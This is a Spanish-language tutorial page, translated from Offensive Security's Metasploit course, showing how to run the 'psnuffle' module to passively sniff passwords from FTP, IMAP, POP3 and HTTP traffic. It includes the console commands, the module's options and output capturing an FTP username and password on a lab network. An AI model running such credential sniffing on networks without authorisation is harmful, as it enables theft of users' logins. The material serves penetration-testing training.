Password Sniffing
De www.metasploit-es.com.ar
Password Sniffing
Recientemente, Max Moser libero un modulo de Metasploit llamado "psnuffle" que es un sniffer de password para obtener las contraseñas parecido a la herramienta dsniff. Actualmente soporta pop3, imap, ftp, y HTTP GET. Puede leer mas sobre el modulo en el Blog de Max en http://remote-exploit.blogspot.com/2009/08/psnuffle-password-sniffer-for.html
Usar el modulo "psnuffle" es extremadamente fácil. Tiene algunas opciones disponibles pero el modulo funciona muy bien así por defecto. ("out of the box")
msf > use auxiliary/sniffer/psnuffle msf auxiliary(psnuffle) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all". SNAPLEN 65535 yes The number of bytes to capture TIMEOUT 1 yes The number of seconds to wait for new data
Como puede ver, tiene algunas opciones disponibles, incluyendo la capacidad de importar un archivo capturado a PCAP. Vamos a ejecutar el escaner con las opciones por defecto.
msf auxiliary(psnuffle) > run [*] Auxiliary module running as background job [*] Loaded protocol FTP from /pentest/exploits/framework3/data/exploits/psnuffle/ftp.rb... [*] Loaded protocol IMAP from /pentest/exploits/framework3/data/exploits/psnuffle/imap.rb... [*] Loaded protocol POP3 from /pentest/exploits/framework3/data/exploits/psnuffle/pop3.rb... [*] Loaded protocol URL from /pentest/exploits/framework3/data/exploits/psnuffle/url.rb... [*] Sniffing traffic..... [*] Successful FTP Login: 192.168.1.112:21-192.168.1.101:48614 >> dookie / dookie (220 3Com 3CDaemon FTP Server Version 2.0)
Hemos capturado un login de FTP con éxito. Esta es una excelente herramienta para recopilar información de manera pasiva.
© Offensive Security 2009
Original by www.offensive-security.com Traslated by Jhyx
